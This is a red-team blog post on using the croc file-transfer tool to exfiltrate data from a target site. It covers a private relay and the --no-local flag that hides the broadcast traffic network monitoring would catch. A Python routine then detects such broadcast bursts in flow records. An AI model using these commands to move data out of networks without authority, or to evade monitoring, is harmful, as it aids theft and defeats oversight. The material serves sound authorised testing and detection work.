The Exploit

Notes from the Front Lines of Penetration Testing

Cool Tools Series: Croc for Secure Data Exfiltration

Today, I’d like to introduce a CLI tool that I use on red team engagements to securely exfiltrate data. Croc is a file transfer tool that provides end-to-end encryption, works across multiple platforms, and allows a direct file transfer or one relayed over a web server.

Croc is a great tool to exfiltrate data from a site, as the traffic is fully encrypted and there isn’t a size limit when using a private relay. I have used it to send files upwards of 6.5GB without any issues.

It’s a very straightforward tool to use. There are a couple of things I would recommend doing before using it for a red team engagement, and we will get into why.

Sending Files

Sending a file is as simple as this:

croc send {FILENAME}

On the receiving end, you simply type croc and then enter the receiving code when it prompts you.

Sending files like this uses the Croc relay cloud servers. The files are encrypted until the data lands on the receiving PC. It is truly that simple.

Sending and receiving a file using croc.

Hosting Your Own Croc Relay

For an added layer of security, you can host your own Croc relay using a publicly accessible system. This ensures that you control the data from one end to the other, which is always preferred.

After installing Croc from its Git repository, https://github.com/schollz/croc, we can do this by running the following command on our cloud server:

croc relay

And adding the following on both the sending and receiving nodes:

--relay {PUBLIC IP}:{PORT NUMBER} 

Here you can see the sending node, receiving node, and the relay server:

Using croc relay

Keeping Things Quiet

Now, in order to use this on a red team, we must set a couple of flags. Croc naturally prefers local relaying over cloud relays. Because of this, it sends a large amount of broadcast UDP traffic on its subnet to see whether the receiving node is on the same subnet as the sending node. However, this deluge of broadcast traffic also creates a definitive Indicator of Compromise (IOC) apparent to anything that might be monitoring the network.

Broadcast traffic from croc that we want to bypass

Using the correct flags, you can tell Croc not to use a local relay and to use only a cloud relay instead. With the right combination of flags, you can use your private relay and disable local relaying, keeping things much quieter as far as detection is concerned.

croc --relay {PUBLIC IP}:{PORT NUMBER} send --no-local {FILENAME}

Croc with local relaying disabled
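From the monitoring side, the broadcast burst described in this section is a pattern that can be checked for in flow data. The following Python is an added example, not code from croc or from the original post; the flow-record layout, subnet, addresses, ports, window and threshold are all constructed assumptions.

```python
import ipaddress
from collections import defaultdict

SUBNET = ipaddress.ip_network("10.20.30.0/24")  # constructed monitored subnet
LIMITED_BROADCAST = ipaddress.ip_address("255.255.255.255")

def is_broadcast(dst, subnet):
    """True for limited broadcast, the subnet's directed broadcast, or multicast."""
    addr = ipaddress.ip_address(dst)
    return addr == LIMITED_BROADCAST or addr == subnet.broadcast_address or addr.is_multicast

def find_broadcast_bursts(flows, subnet, window_ms=10_000, threshold=20):
    """Return {src_ip: peak datagram count} for sources whose UDP broadcast
    datagrams reach `threshold` inside any sliding window of `window_ms`."""
    stamps_by_src = defaultdict(list)
    for ts_ms, src, dst, proto, _dport in flows:
        if proto == "udp" and is_broadcast(dst, subnet):
            stamps_by_src[src].append(ts_ms)
    flagged = {}
    for src, stamps in stamps_by_src.items():
        stamps.sort()
        start = peak = 0
        for end, ts in enumerate(stamps):
            # Slide the window start forward until it spans less than window_ms.
            while ts - stamps[start] >= window_ms:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[src] = peak
    return flagged

def sample_flows():
    """Constructed records: (timestamp_ms, src, dst, protocol, dst_port)."""
    flows = []
    # Workstation emitting a dense run of broadcasts (40 in under 8 seconds).
    for i in range(40):
        flows.append((1_000_000 + i * 200, "10.20.30.57", "10.20.30.255", "udp", 40000))
    # Ordinary background chatter: a few broadcasts spread over a minute.
    for i in range(3):
        flows.append((1_000_000 + i * 30_000, "10.20.30.12", "255.255.255.255", "udp", 67))
    # Unicast traffic must never count, however busy.
    for i in range(100):
        flows.append((1_000_000 + i * 50, "10.20.30.57", "10.20.30.8", "udp", 53))
    return flows

if __name__ == "__main__":
    for src, peak in find_broadcast_bursts(sample_flows(), SUBNET).items():
        print(f"{src}: {peak} UDP broadcast datagrams within 10 s")
```

As the post notes, a sender run with local relaying disabled does not produce this broadcast pattern, so this check only covers default invocations.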

In Conclusion

Croc is a simple, easy-to-use tool that I find useful on penetration testing and red team engagements. Thanks for reading, and if you found these tips useful, take a look at other blogs in our technical how-to series.


Nathan Anderson
